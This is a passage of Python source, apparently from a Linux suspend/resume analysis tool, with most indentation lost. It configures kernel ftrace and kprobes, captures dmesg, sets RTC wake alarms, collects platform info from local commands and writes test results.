'intel_opregion_register': {},
'intel_dp_detect': {},
'intel_hdmi_detect': {},
'intel_opregion_init': {},
'intel_fbdev_set_suspend': {},
}
infocmds = [
[0, 'kparams', 'cat', '/proc/cmdline'],
[0, 'mcelog', 'mcelog'],
[0, 'pcidevices', 'lspci', '-tv'],
[0, 'usbdevices', 'lsusb', '-t'],
[1, 'interrupts', 'cat', '/proc/interrupts'],
[1, 'wakeups', 'cat', '/sys/kernel/debug/wakeup_sources'],
[2, 'gpecounts', 'sh', '-c', 'grep -v invalid /sys/firmware/acpi/interrupts/*'],
[2, 'suspendstats', 'sh', '-c', 'grep -v invalid /sys/power/suspend_stats/*'],
[2, 'cpuidle', 'sh', '-c', 'grep -v invalid /sys/devices/system/cpu/cpu*/cpuidle/state*/s2idle/*'],
[2, 'battery', 'sh', '-c', 'grep -v invalid /sys/class/power_supply/*/*'],
]
cgblacklist = []
kprobes = dict()
timeformat = '%.3f'
cmdline = '%s %s' % \
(os.path.basename(sys.argv[0]), ' '.join(sys.argv[1:]))
sudouser = ''
def __init__(self):
self.archargs = 'args_'+platform.machine()
self.hostname = platform.node()
if(self.hostname == ''):
self.hostname = 'localhost'
rtc = "rtc0"
if os.path.exists('/dev/rtc'):
rtc = os.readlink('/dev/rtc')
rtc = '/sys/class/rtc/'+rtc
if os.path.exists(rtc) and os.path.exists(rtc+'/date') and \
os.path.exists(rtc+'/time') and os.path.exists(rtc+'/wakealarm'):
self.rtcpath = rtc
if (hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()):
self.ansi = True
self.testdir = datetime.now().strftime('suspend-%y%m%d-%H%M%S')
if os.getuid() == 0 and 'SUDO_USER' in os.environ and \
os.environ['SUDO_USER']:
self.sudouser = os.environ['SUDO_USER']
def resetlog(self):
self.logmsg = ''
self.platinfo = []
def vprint(self, msg):
self.logmsg += msg+'\n'
if self.verbose or msg.startswith('WARNING:'):
pprint(msg)
def signalHandler(self, signum, frame):
if not self.result:
return
signame = self.signames[signum] if signum in self.signames else 'UNKNOWN'
msg = 'Signal %s caused a tool exit, line %d' % (signame, frame.f_lineno)
self.outputResult({'error':msg})
sys.exit(3)
def signalHandlerInit(self):
capture = ['BUS', 'SYS', 'XCPU', 'XFSZ', 'PWR', 'HUP', 'INT', 'QUIT',
'ILL', 'ABRT', 'FPE', 'SEGV', 'TERM']
self.signames = dict()
for i in capture:
s = 'SIG'+i
try:
signum = getattr(signal, s)
signal.signal(signum, self.signalHandler)
except:
continue
self.signames[signum] = s
def rootCheck(self, fatal=True):
if(os.access(self.powerfile, os.W_OK)):
return True
if fatal:
msg = 'This command requires sysfs mount and root access'
pprint('ERROR: %s\n' % msg)
self.outputResult({'error':msg})
sys.exit(1)
return False
def rootUser(self, fatal=False):
if 'USER' in os.environ and os.environ['USER'] == 'root':
return True
if fatal:
msg = 'This command must be run as root'
pprint('ERROR: %s\n' % msg)
self.outputResult({'error':msg})
sys.exit(1)
return False
def usable(self, file):
return (os.path.exists(file) and os.path.getsize(file) > 0)
def getExec(self, cmd):
try:
fp = Popen(['which', cmd], stdout=PIPE, stderr=PIPE).stdout
out = ascii(fp.read()).strip()
fp.close()
except:
out = ''
if out:
return out
for path in ['/sbin', '/bin', '/usr/sbin', '/usr/bin',
'/usr/local/sbin', '/usr/local/bin']:
cmdfull = os.path.join(path, cmd)
if os.path.exists(cmdfull):
return cmdfull
return out
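# getExec resolves a command name via 'which' and falls back to scanning common bin/sbin
# directories; returns '' if the command cannot be found.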
def setPrecision(self, num):
if num < 0 or num > 6:
return
self.timeformat = '%.{0}f'.format(num)
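# e.g. setPrecision(6) switches timestamp output to '%.6f'; values outside 0..6 are ignored.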
def setOutputFolder(self, value):
args = dict()
n = datetime.now()
args['date'] = n.strftime('%y%m%d')
args['time'] = n.strftime('%H%M%S')
args['hostname'] = args['host'] = self.hostname
args['mode'] = self.suspendmode
return value.format(**args)
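# Illustrative: a value of 'suspend-{hostname}-{date}-{time}' expands to something like
# 'suspend-myhost-210101-093000' using the fields filled in above.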
def setOutputFile(self):
if self.dmesgfile != '':
m = re.match('(?P<name>.*)_dmesg\.txt.*', self.dmesgfile)
if(m):
self.htmlfile = m.group('name')+'.html'
if self.ftracefile != '':
m = re.match('(?P<name>.*)_ftrace\.txt.*', self.ftracefile)
if(m):
self.htmlfile = m.group('name')+'.html'
def systemInfo(self, info):
p = m = ''
if 'baseboard-manufacturer' in info:
m = info['baseboard-manufacturer']
elif 'system-manufacturer' in info:
m = info['system-manufacturer']
if 'system-product-name' in info:
p = info['system-product-name']
elif 'baseboard-product-name' in info:
p = info['baseboard-product-name']
if m[:5].lower() == 'intel' and 'baseboard-product-name' in info:
p = info['baseboard-product-name']
c = info['processor-version'] if 'processor-version' in info else ''
b = info['bios-version'] if 'bios-version' in info else ''
r = info['bios-release-date'] if 'bios-release-date' in info else ''
self.sysstamp = '# sysinfo | man:%s | plat:%s | cpu:%s | bios:%s | biosdate:%s | numcpu:%d | memsz:%d | memfr:%d' % \
(m, p, c, b, r, self.cpucount, self.memtotal, self.memfree)
def printSystemInfo(self, fatal=False):
self.rootCheck(True)
out = dmidecode(self.mempath, fatal)
if len(out) < 1:
return
fmt = '%-24s: %s'
for name in sorted(out):
print(fmt % (name, out[name]))
print(fmt % ('cpucount', ('%d' % self.cpucount)))
print(fmt % ('memtotal', ('%d kB' % self.memtotal)))
print(fmt % ('memfree', ('%d kB' % self.memfree)))
def cpuInfo(self):
self.cpucount = 0
fp = open('/proc/cpuinfo', 'r')
for line in fp:
if re.match('^processor[ \t]*:[ \t]*[0-9]*', line):
self.cpucount += 1
fp.close()
fp = open('/proc/meminfo', 'r')
for line in fp:
m = re.match('^MemTotal:[ \t]*(?P<sz>[0-9]*) *kB', line)
if m:
self.memtotal = int(m.group('sz'))
m = re.match('^MemFree:[ \t]*(?P<sz>[0-9]*) *kB', line)
if m:
self.memfree = int(m.group('sz'))
fp.close()
def initTestOutput(self, name):
self.prefix = self.hostname
v = open('/proc/version', 'r').read().strip()
kver = v.split()[2]
fmt = name+'-%m%d%y-%H%M%S'
testtime = datetime.now().strftime(fmt)
self.teststamp = \
'# '+testtime+' '+self.prefix+' '+self.suspendmode+' '+kver
ext = ''
if self.gzip:
ext = '.gz'
self.dmesgfile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'_dmesg.txt'+ext
self.ftracefile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'_ftrace.txt'+ext
self.htmlfile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'.html'
if not os.path.isdir(self.testdir):
os.makedirs(self.testdir)
self.sudoUserchown(self.testdir)
def getValueList(self, value):
out = []
for i in value.split(','):
if i.strip():
out.append(i.strip())
return out
def setDeviceFilter(self, value):
self.devicefilter = self.getValueList(value)
def setCallgraphFilter(self, value):
self.cgfilter = self.getValueList(value)
def skipKprobes(self, value):
for k in self.getValueList(value):
if k in self.tracefuncs:
del self.tracefuncs[k]
if k in self.dev_tracefuncs:
del self.dev_tracefuncs[k]
def setCallgraphBlacklist(self, file):
self.cgblacklist = self.listFromFile(file)
def rtcWakeAlarmOn(self):
call('echo 0 > '+self.rtcpath+'/wakealarm', shell=True)
nowtime = open(self.rtcpath+'/since_epoch', 'r').read().strip()
if nowtime:
nowtime = int(nowtime)
else:
# if hardware time fails, use the software time
nowtime = int(datetime.now().strftime('%s'))
alarm = nowtime + self.rtcwaketime
call('echo %d > %s/wakealarm' % (alarm, self.rtcpath), shell=True)
def rtcWakeAlarmOff(self):
call('echo 0 > %s/wakealarm' % self.rtcpath, shell=True)
def initdmesg(self):
# get the latest time stamp from the dmesg log
lines = Popen('dmesg', stdout=PIPE).stdout.readlines()
ktime = '0'
for line in reversed(lines):
line = ascii(line).replace('\r\n', '')
idx = line.find('[')
if idx > 1:
line = line[idx:]
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(m):
ktime = m.group('ktime')
break
self.dmesgstart = float(ktime)
def getdmesg(self, testdata):
op = self.writeDatafileHeader(self.dmesgfile, testdata)
# store all new dmesg lines since initdmesg was called
fp = Popen('dmesg', stdout=PIPE).stdout
for line in fp:
line = ascii(line).replace('\r\n', '')
idx = line.find('[')
if idx > 1:
line = line[idx:]
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(not m):
continue
ktime = float(m.group('ktime'))
if ktime > self.dmesgstart:
op.write(line)
fp.close()
op.close()
def listFromFile(self, file):
list = []
fp = open(file)
for i in fp.read().split('\n'):
i = i.strip()
if i and i[0] != '#':
list.append(i)
fp.close()
return list
def addFtraceFilterFunctions(self, file):
for i in self.listFromFile(file):
if len(i) < 2:
continue
self.tracefuncs[i] = dict()
def getFtraceFilterFunctions(self, current):
self.rootCheck(True)
if not current:
call('cat '+self.tpath+'available_filter_functions', shell=True)
return
master = self.listFromFile(self.tpath+'available_filter_functions')
for i in sorted(self.tracefuncs):
if 'func' in self.tracefuncs[i]:
i = self.tracefuncs[i]['func']
if i in master:
print(i)
else:
print(self.colorText(i))
def setFtraceFilterFunctions(self, list):
master = self.listFromFile(self.tpath+'available_filter_functions')
flist = ''
for i in list:
if i not in master:
continue
if ' [' in i:
flist += i.split(' ')[0]+'\n'
else:
flist += i+'\n'
fp = open(self.tpath+'set_graph_function', 'w')
fp.write(flist)
fp.close()
def basicKprobe(self, name):
self.kprobes[name] = {'name': name,'func': name,'args': dict(),'format': name}
def defaultKprobe(self, name, kdata):
k = kdata
for field in ['name', 'format', 'func']:
if field not in k:
k[field] = name
if self.archargs in k:
k['args'] = k[self.archargs]
else:
k['args'] = dict()
k['format'] = name
self.kprobes[name] = k
def kprobeColor(self, name):
if name not in self.kprobes or 'color' not in self.kprobes[name]:
return ''
return self.kprobes[name]['color']
def kprobeDisplayName(self, name, dataraw):
if name not in self.kprobes:
self.basicKprobe(name)
data = ''
quote=0
# first remove any spaces inside quotes, and the quotes themselves
for c in dataraw:
if c == '"':
quote = (quote + 1) % 2
if quote and c == ' ':
data += '_'
elif c != '"':
data += c
fmt, args = self.kprobes[name]['format'], self.kprobes[name]['args']
arglist = dict()
# now process the args
for arg in sorted(args):
arglist[arg] = ''
m = re.match('.* '+arg+'=(?P<arg>.*) ', data);
if m:
arglist[arg] = m.group('arg')
else:
m = re.match('.* '+arg+'=(?P<arg>.*)', data);
if m:
arglist[arg] = m.group('arg')
out = fmt.format(**arglist)
out = out.replace(' ', '_').replace('"', '')
return out
def kprobeText(self, kname, kprobe):
name = fmt = func = kname
args = dict()
if 'name' in kprobe:
name = kprobe['name']
if 'format' in kprobe:
fmt = kprobe['format']
if 'func' in kprobe:
func = kprobe['func']
if self.archargs in kprobe:
args = kprobe[self.archargs]
if 'args' in kprobe:
args = kprobe['args']
if re.findall('{(?P<n>[a-z,A-Z,0-9]*)}', func):
doError('Kprobe "%s" has format info in the function name "%s"' % (name, func))
for arg in re.findall('{(?P<n>[a-z,A-Z,0-9]*)}', fmt):
if arg not in args:
doError('Kprobe "%s" is missing argument "%s"' % (name, arg))
val = 'p:%s_cal %s' % (name, func)
for i in sorted(args):
val += ' %s=%s' % (i, args[i])
val += '\nr:%s_ret %s $retval\n' % (name, func)
return val
def addKprobes(self, output=False):
if len(self.kprobes) < 1:
return
if output:
pprint(' kprobe functions in this kernel:')
# first test each kprobe
rejects = []
# sort kprobes: trace, ub-dev, custom, dev
kpl = [[], [], [], []]
linesout = len(self.kprobes)
for name in sorted(self.kprobes):
res = self.colorText('YES', 32)
if not self.testKprobe(name, self.kprobes[name]):
res = self.colorText('NO')
rejects.append(name)
else:
if name in self.tracefuncs:
kpl[0].append(name)
elif name in self.dev_tracefuncs:
if 'ub' in self.dev_tracefuncs[name]:
kpl[1].append(name)
else:
kpl[3].append(name)
else:
kpl[2].append(name)
if output:
pprint(' %s: %s' % (name, res))
kplist = kpl[0] + kpl[1] + kpl[2] + kpl[3]
# remove all failed ones from the list
for name in rejects:
self.kprobes.pop(name)
# set the kprobes all at once
self.fsetVal('', 'kprobe_events')
kprobeevents = ''
for kp in kplist:
kprobeevents += self.kprobeText(kp, self.kprobes[kp])
self.fsetVal(kprobeevents, 'kprobe_events')
if output:
check = self.fgetVal('kprobe_events')
linesack = (len(check.split('\n')) - 1) // 2
pprint(' kprobe functions enabled: %d/%d' % (linesack, linesout))
self.fsetVal('1', 'events/kprobes/enable')
def testKprobe(self, kname, kprobe):
self.fsetVal('0', 'events/kprobes/enable')
kprobeevents = self.kprobeText(kname, kprobe)
if not kprobeevents:
return False
try:
self.fsetVal(kprobeevents, 'kprobe_events')
check = self.fgetVal('kprobe_events')
except:
return False
linesout = len(kprobeevents.split('\n'))
linesack = len(check.split('\n'))
if linesack < linesout:
return False
return True
def setVal(self, val, file):
if not os.path.exists(file):
return False
try:
fp = open(file, 'wb', 0)
fp.write(val.encode())
fp.flush()
fp.close()
except:
return False
return True
def fsetVal(self, val, path):
return self.setVal(val, self.tpath+path)
def getVal(self, file):
res = ''
if not os.path.exists(file):
return res
try:
fp = open(file, 'r')
res = fp.read()
fp.close()
except:
pass
return res
def fgetVal(self, path):
return self.getVal(self.tpath+path)
def cleanupFtrace(self):
if(self.usecallgraph or self.usetraceevents or self.usedevsrc):
self.fsetVal('0', 'events/kprobes/enable')
self.fsetVal('', 'kprobe_events')
self.fsetVal('1024', 'buffer_size_kb')
def setupAllKprobes(self):
for name in self.tracefuncs:
self.defaultKprobe(name, self.tracefuncs[name])
for name in self.dev_tracefuncs:
self.defaultKprobe(name, self.dev_tracefuncs[name])
def isCallgraphFunc(self, name):
if len(self.tracefuncs) < 1 and self.suspendmode == 'command':
return True
for i in self.tracefuncs:
if 'func' in self.tracefuncs[i]:
f = self.tracefuncs[i]['func']
else:
f = i
if name == f:
return True
return False
def initFtrace(self, quiet=False):
if not quiet:
sysvals.printSystemInfo(False)
pprint('INITIALIZING FTRACE...')
# turn trace off
self.fsetVal('0', 'tracing_on')
self.cleanupFtrace()
self.testVal(self.pmdpath, 'basic', '1')
# set the trace clock to global
self.fsetVal('global', 'trace_clock')
self.fsetVal('nop', 'current_tracer')
# set trace buffer to an appropriate value
cpus = max(1, self.cpucount)
if self.bufsize > 0:
tgtsize = self.bufsize
elif self.usecallgraph or self.usedevsrc:
bmax = (1*1024*1024) if self.suspendmode in ['disk', 'command'] \
else (3*1024*1024)
tgtsize = min(self.memfree, bmax)
else:
tgtsize = 65536
while not self.fsetVal('%d' % (tgtsize // cpus), 'buffer_size_kb'):
# if the size failed to set, lower it and keep trying
tgtsize -= 65536
if tgtsize < 65536:
tgtsize = int(self.fgetVal('buffer_size_kb')) * cpus
break
self.vprint('Setting trace buffers to %d kB (%d kB per cpu)' % (tgtsize, tgtsize/cpus))
# initialize the callgraph trace
if(self.usecallgraph):
# set trace type
self.fsetVal('function_graph', 'current_tracer')
self.fsetVal('', 'set_ftrace_filter')
# set trace format options
self.fsetVal('print-parent', 'trace_options')
self.fsetVal('funcgraph-abstime', 'trace_options')
self.fsetVal('funcgraph-cpu', 'trace_options')
self.fsetVal('funcgraph-duration', 'trace_options')
self.fsetVal('funcgraph-proc', 'trace_options')
self.fsetVal('funcgraph-tail', 'trace_options')
self.fsetVal('nofuncgraph-overhead', 'trace_options')
self.fsetVal('context-info', 'trace_options')
self.fsetVal('graph-time', 'trace_options')
self.fsetVal('%d' % self.max_graph_depth, 'max_graph_depth')
cf = ['dpm_run_callback']
if(self.usetraceevents):
cf += ['dpm_prepare', 'dpm_complete']
for fn in self.tracefuncs:
if 'func' in self.tracefuncs[fn]:
cf.append(self.tracefuncs[fn]['func'])
else:
cf.append(fn)
if self.ftop:
self.setFtraceFilterFunctions([self.ftopfunc])
else:
self.setFtraceFilterFunctions(cf)
# initialize the kprobe trace
elif self.usekprobes:
for name in self.tracefuncs:
self.defaultKprobe(name, self.tracefuncs[name])
if self.usedevsrc:
for name in self.dev_tracefuncs:
self.defaultKprobe(name, self.dev_tracefuncs[name])
if not quiet:
pprint('INITIALIZING KPROBES...')
self.addKprobes(self.verbose)
if(self.usetraceevents):
# turn trace events on
events = iter(self.traceevents)
for e in events:
self.fsetVal('1', 'events/power/'+e+'/enable')
# clear the trace buffer
self.fsetVal('', 'trace')
def verifyFtrace(self):
# files needed for any trace data
files = ['buffer_size_kb', 'current_tracer', 'trace', 'trace_clock',
'trace_marker', 'trace_options', 'tracing_on']
# files needed for callgraph trace data
tp = self.tpath
if(self.usecallgraph):
files += [
'available_filter_functions',
'set_ftrace_filter',
'set_graph_function'
]
for f in files:
if(os.path.exists(tp+f) == False):
return False
return True
def verifyKprobes(self):
# files needed for kprobes to work
files = ['kprobe_events', 'events']
tp = self.tpath
for f in files:
if(os.path.exists(tp+f) == False):
return False
return True
def colorText(self, str, color=31):
if not self.ansi:
return str
return '\x1B[%d;40m%s\x1B[m' % (color, str)
def writeDatafileHeader(self, filename, testdata):
fp = self.openlog(filename, 'w')
fp.write('%s\n%s\n# command | %s\n' % (self.teststamp, self.sysstamp, self.cmdline))
for test in testdata:
if 'fw' in test:
fw = test['fw']
if(fw):
fp.write('# fwsuspend %u fwresume %u\n' % (fw[0], fw[1]))
if 'turbo' in test:
fp.write('# turbostat %s\n' % test['turbo'])
if 'wifi' in test:
fp.write('# wifi %s\n' % test['wifi'])
if test['error'] or len(testdata) > 1:
fp.write('# enter_sleep_error %s\n' % test['error'])
return fp
def sudoUserchown(self, dir):
if os.path.exists(dir) and self.sudouser:
cmd = 'chown -R {0}:{0} {1} > /dev/null 2>&1'
call(cmd.format(self.sudouser, dir), shell=True)
def outputResult(self, testdata, num=0):
if not self.result:
return
n = ''
if num > 0:
n = '%d' % num
fp = open(self.result, 'a')
if 'error' in testdata:
fp.write('result%s: fail\n' % n)
fp.write('error%s: %s\n' % (n, testdata['error']))
else:
fp.write('result%s: pass\n' % n)
for v in ['suspend', 'resume', 'boot', 'lastinit']:
if v in testdata:
fp.write('%s%s: %.3f\n' % (v, n, testdata[v]))
for v in ['fwsuspend', 'fwresume']:
if v in testdata:
fp.write('%s%s: %.3f\n' % (v, n, testdata[v] / 1000000.0))
if 'bugurl' in testdata:
fp.write('url%s: %s\n' % (n, testdata['bugurl']))
fp.close()
self.sudoUserchown(self.result)
def configFile(self, file):
dir = os.path.dirname(os.path.realpath(__file__))
if os.path.exists(file):
return file
elif os.path.exists(dir+'/'+file):
return dir+'/'+file
elif os.path.exists(dir+'/config/'+file):
return dir+'/config/'+file
return ''
def openlog(self, filename, mode):
isgz = self.gzip
if mode == 'r':
try:
with gzip.open(filename, mode+'t') as fp:
test = fp.read(64)
isgz = True
except:
isgz = False
if isgz:
return gzip.open(filename, mode+'t')
return open(filename, mode)
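# openlog is gzip-aware: for reads it probes for gzip content and falls back to plain text;
# for writes it gzips only when self.gzip is set.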
def putlog(self, filename, text):
with self.openlog(filename, 'a') as fp:
fp.write(text)
fp.close()
def dlog(self, text):
self.putlog(self.dmesgfile, '# %s\n' % text)
def flog(self, text):
self.putlog(self.ftracefile, text)
def b64unzip(self, data):
try:
out = codecs.decode(base64.b64decode(data), 'zlib').decode()
except:
out = data
return out
def b64zip(self, data):
out = base64.b64encode(codecs.encode(data.encode(), 'zlib')).decode()
return out
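# b64zip/b64unzip are a zlib+base64 round trip: b64unzip(b64zip(text)) == text, and
# b64unzip returns its input unchanged if decoding fails.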
def platforminfo(self, cmdafter):
# add platform info on to a completed ftrace file
if not os.path.exists(self.ftracefile):
return False
footer = '#\n'
# add test command string line if need be
if self.suspendmode == 'command' and self.testcommand:
footer += '# platform-testcmd: %s\n' % (self.testcommand)
# get a list of target devices from the ftrace file
props = dict()
tp = TestProps()
tf = self.openlog(self.ftracefile, 'r')
for line in tf:
if tp.stampInfo(line, self):
continue
# parse only valid lines; if this is not one, move on
m = re.match(tp.ftrace_line_fmt, line)
if(not m or 'device_pm_callback_start' not in line):
continue
m = re.match('.*: (?P<drv>.*) (?P<d>.*), parent: *(?P<p>.*), .*', m.group('msg'));
if(not m):
continue
dev = m.group('d')
if dev not in props:
props[dev] = DevProps()
tf.close()
# now get the syspath for each target device
for dirname, dirnames, filenames in os.walk('/sys/devices'):
if(re.match('.*/power', dirname) and 'async' in filenames):
dev = dirname.split('/')[-2]
if dev in props and (not props[dev].syspath or len(dirname) < len(props[dev].syspath)):
props[dev].syspath = dirname[:-6]
# now fill in the properties for our target devices
for dev in sorted(props):
dirname = props[dev].syspath
if not dirname or not os.path.exists(dirname):
continue
with open(dirname+'/power/async') as fp:
text = fp.read()
props[dev].isasync = False
if 'enabled' in text:
props[dev].isasync = True
fields = os.listdir(dirname)
if 'product' in fields:
with open(dirname+'/product', 'rb') as fp:
props[dev].altname = ascii(fp.read())
elif 'name' in fields:
with open(dirname+'/name', 'rb') as fp:
props[dev].altname = ascii(fp.read())
elif 'model' in fields:
with open(dirname+'/model', 'rb') as fp:
props[dev].altname = ascii(fp.read())
elif 'description' in fields:
with open(dirname+'/description', 'rb') as fp:
props[dev].altname = ascii(fp.read())
elif 'id' in fields:
with open(dirname+'/id', 'rb') as fp:
props[dev].altname = ascii(fp.read())
elif 'idVendor' in fields and 'idProduct' in fields:
idv, idp = '', ''
with open(dirname+'/idVendor', 'rb') as fp:
idv = ascii(fp.read()).strip()
with open(dirname+'/idProduct', 'rb') as fp:
idp = ascii(fp.read()).strip()
props[dev].altname = '%s:%s' % (idv, idp)
if props[dev].altname:
out = props[dev].altname.strip().replace('\n', ' ')\
.replace(',', ' ').replace(';', ' ')
props[dev].altname = out
# add a devinfo line to the bottom of ftrace
out = ''
for dev in sorted(props):
out += props[dev].out(dev)
footer += '# platform-devinfo: %s\n' % self.b64zip(out)
# add a line for each of these commands with their outputs
for name, cmdline, info in cmdafter:
footer += '# platform-%s: %s | %s\n' % (name, cmdline, self.b64zip(info))
self.flog(footer)
return True
def commonPrefix(self, list):
if len(list) < 2:
return ''
prefix = list[0]
for s in list[1:]:
while s[:len(prefix)] != prefix and prefix:
prefix = prefix[:len(prefix)-1]
if not prefix:
break
if '/' in prefix and prefix[-1] != '/':
prefix = prefix[0:prefix.rfind('/')+1]
return prefix
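# e.g. commonPrefix(['/sys/a/x', '/sys/a/y']) returns '/sys/a/' (the shared prefix, trimmed
# back to the last '/').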
def dictify(self, text, format):
out = dict()
header = True if format == 1 else False
delim = ' ' if format == 1 else ':'
for line in text.split('\n'):
if header:
header, out['@'] = False, line
continue
line = line.strip()
if delim in line:
data = line.split(delim, 1)
num = re.search(r'[\d]+', data[1])
if format == 2 and num:
out[data[0].strip()] = num.group()
else:
out[data[0].strip()] = data[1]
return out
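# dictify: with format 1 the first line is stored under '@' and the rest are split on the first
# space; with format 2 lines are split on ':' and only the first number in each value is kept.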
def cmdinfo(self, begin, debug=False):
out = []
if begin:
self.cmd1 = dict()
for cargs in self.infocmds:
delta, name = cargs[0], cargs[1]
cmdline, cmdpath = ' '.join(cargs[2:]), self.getExec(cargs[2])
if not cmdpath or (begin and not delta):
continue
self.dlog('[%s]' % cmdline)
try:
fp = Popen([cmdpath]+cargs[3:], stdout=PIPE, stderr=PIPE).stdout
info = ascii(fp.read()).strip()
fp.close()
except:
continue
if not debug and begin:
self.cmd1[name] = self.dictify(info, delta)
elif not debug and delta and name in self.cmd1:
before, after = self.cmd1[name], self.dictify(info, delta)
dinfo = ('\t%s\n' % before['@']) if '@' in before else ''
prefix = self.commonPrefix(list(before.keys()))
for key in sorted(before):
if key in after and before[key] != after[key]:
title = key.replace(prefix, '')
if delta == 2:
dinfo += '\t%s : %s -> %s\n' % \
(title, before[key].strip(), after[key].strip())
else:
dinfo += '%10s (start) : %s\n%10s (after) : %s\n' % \
(title, before[key], title, after[key])
dinfo = '\tnothing changed' if not dinfo else dinfo.rstrip()
out.append((name, cmdline, dinfo))
else:
out.append((name, cmdline, '\tnothing' if not info else info))
return out
def testVal(self, file, fmt='basic', value=''):
if file == 'restoreall':
for f in self.cfgdef:
if os.path.exists(f):
fp = open(f, 'w')
fp.write(self.cfgdef[f])
fp.close()
self.cfgdef = dict()
elif value and os.path.exists(file):
fp = open(file, 'r+')
if fmt == 'radio':
m = re.match('.*\[(?P<v>.*)\].*', fp.read())
if m:
self.cfgdef[file] = m.group('v')
elif fmt == 'acpi':
line = fp.read().strip().split('\n')[-1]
m = re.match('.* (?P<v>[0-9A-Fx]*) .*', line)
if m:
self.cfgdef[file] = m.group('v')
else:
self.cfgdef[file] = fp.read().strip()
fp.write(value)
fp.close()
def haveTurbostat(self):
if not self.tstat:
return False
cmd = self.getExec('turbostat')
if not cmd:
return False
fp = Popen([cmd, '-v'], stdout=PIPE, stderr=PIPE).stderr
out = ascii(fp.read()).strip()
fp.close()
if re.match('turbostat version .*', out):
self.vprint(out)
return True
return False
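	# turbostat wraps an "echo freeze > powerfile" suspend trigger and condenses
	# the single header/value row pair from its output into a pipe-delimited
	# key=value string, e.g. "Avg_MHz=24|Busy%=1.37|..." (values hypothetical).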
def turbostat(self):
cmd = self.getExec('turbostat')
rawout = keyline = valline = ''
fullcmd = '%s -q -S echo freeze > %s' % (cmd, self.powerfile)
fp = Popen(['sh', '-c', fullcmd], stdout=PIPE, stderr=PIPE).stderr
for line in fp:
line = ascii(line)
rawout += line
if keyline and valline:
continue
if re.match('(?i)Avg_MHz.*', line):
keyline = line.strip().split()
elif keyline:
valline = line.strip().split()
fp.close()
if not keyline or not valline or len(keyline) != len(valline):
errmsg = 'unrecognized turbostat output:\n'+rawout.strip()
self.vprint(errmsg)
if not self.verbose:
pprint(errmsg)
return ''
if self.verbose:
pprint(rawout.strip())
out = []
for key in keyline:
idx = keyline.index(key)
val = valline[idx]
out.append('%s=%s' % (key, val))
return '|'.join(out)
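	# wifiDetails summarizes a wifi device from its uevent file as a
	# colon-joined string, i.e. "<dev>:<DRIVER>:<PCI_ID>" when both properties
	# are present, or just the device name if the file cannot be read.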
def wifiDetails(self, dev):
try:
info = open('/sys/class/net/%s/device/uevent' % dev, 'r').read().strip()
except:
return dev
vals = [dev]
for prop in info.split('\n'):
if prop.startswith('DRIVER=') or prop.startswith('PCI_ID='):
vals.append(prop.split('=')[-1])
return ':'.join(vals)
def checkWifi(self, dev=''):
try:
w = open('/proc/net/wireless', 'r').read().strip()
except:
return ''
for line in reversed(w.split('\n')):
			m = re.match(' *(?P<dev>.*): (?P<stat>[0-9a-f]*) .*', line)
if not m or (dev and dev != m.group('dev')):
continue
return m.group('dev')
return ''
def pollWifi(self, dev, timeout=60):
start = time.time()
while (time.time() - start) < timeout:
w = self.checkWifi(dev)
if w:
return '%s reconnected %.2f' % \
(self.wifiDetails(dev), max(0, time.time() - start))
time.sleep(0.01)
return '%s timeout %d' % (self.wifiDetails(dev), timeout)
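	# errorSummary deduplicates error messages across reports: any number in a
	# new message is generalized to a "[0-9,\-\.]*" pattern, so later messages
	# that differ only in numeric values match the same entry and simply bump
	# its count and url list.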
def errorSummary(self, errinfo, msg):
found = False
for entry in errinfo:
if re.match(entry['match'], msg):
entry['count'] += 1
if self.hostname not in entry['urls']:
entry['urls'][self.hostname] = [self.htmlfile]
elif self.htmlfile not in entry['urls'][self.hostname]:
entry['urls'][self.hostname].append(self.htmlfile)
found = True
break
if found:
return
arr = msg.split()
for j in range(len(arr)):
if re.match('^[0-9,\-\.]*$', arr[j]):
arr[j] = '[0-9,\-\.]*'
else:
arr[j] = arr[j]\
.replace('\\', '\\\\').replace(']', '\]').replace('[', '\[')\
.replace('.', '\.').replace('+', '\+').replace('*', '\*')\
.replace('(', '\(').replace(')', '\)').replace('}', '\}')\
.replace('{', '\{')
mstr = ' *'.join(arr)
entry = {
'line': msg,
'match': mstr,
'count': 1,
'urls': {self.hostname: [self.htmlfile]}
}
errinfo.append(entry)
def multistat(self, start, idx, finish):
if 'time' in self.multitest:
id = '%d Duration=%dmin' % (idx+1, self.multitest['time'])
else:
id = '%d/%d' % (idx+1, self.multitest['count'])
t = time.time()
if 'start' not in self.multitest:
self.multitest['start'] = self.multitest['last'] = t
self.multitest['total'] = 0.0
pprint('TEST (%s) START' % id)
return
dt = t - self.multitest['last']
if not start:
if idx == 0 and self.multitest['delay'] > 0:
self.multitest['total'] += self.multitest['delay']
pprint('TEST (%s) COMPLETE -- Duration %.1fs' % (id, dt))
return
self.multitest['total'] += dt
self.multitest['last'] = t
avg = self.multitest['total'] / idx
if 'time' in self.multitest:
left = finish - datetime.now()
left -= timedelta(microseconds=left.microseconds)
else:
left = timedelta(seconds=((self.multitest['count'] - idx) * int(avg)))
pprint('TEST (%s) START - Avg Duration %.1fs, Time left %s' % \
(id, avg, str(left)))
def multiinit(self, c, d):
sz, unit = 'count', 'm'
if c.endswith('d') or c.endswith('h') or c.endswith('m'):
sz, unit, c = 'time', c[-1], c[:-1]
self.multitest['run'] = True
self.multitest[sz] = getArgInt('multi: n d (exec count)', c, 1, 1000000, False)
self.multitest['delay'] = getArgInt('multi: n d (delay between tests)', d, 0, 3600, False)
if unit == 'd':
self.multitest[sz] *= 1440
elif unit == 'h':
self.multitest[sz] *= 60
def displayControl(self, cmd):
xset, ret = 'timeout 10 xset -d :0.0 {0}', 0
if self.sudouser:
xset = 'sudo -u %s %s' % (self.sudouser, xset)
if cmd == 'init':
ret = call(xset.format('dpms 0 0 0'), shell=True)
if not ret:
ret = call(xset.format('s off'), shell=True)
elif cmd == 'reset':
ret = call(xset.format('s reset'), shell=True)
elif cmd in ['on', 'off', 'standby', 'suspend']:
b4 = self.displayControl('stat')
ret = call(xset.format('dpms force %s' % cmd), shell=True)
if not ret:
curr = self.displayControl('stat')
self.vprint('Display Switched: %s -> %s' % (b4, curr))
if curr != cmd:
self.vprint('WARNING: Display failed to change to %s' % cmd)
if ret:
self.vprint('WARNING: Display failed to change to %s with xset' % cmd)
